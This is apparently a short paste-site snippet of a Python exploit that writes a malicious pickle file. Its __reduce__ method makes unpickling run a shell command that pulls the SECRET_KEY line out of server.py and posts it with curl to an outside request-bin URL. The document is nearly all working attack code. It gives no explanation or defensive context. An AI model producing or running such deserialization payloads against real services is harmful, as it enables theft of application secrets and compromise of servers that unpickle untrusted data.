· 8 years ago · Dec 14, 2017, 03:44 AM
1import pickle
2class exp1(object):
3 def __reduce__(self):
4 import os
5 com = 'cat server.py | grep SECRET_KEY | curl -d @- https://requestb.in/1j33ni81'
6 return (os.system, (com,))
7inst = exp1()
8pick = open("malicious.pickle","wb")
9pickle.dump(inst,pick)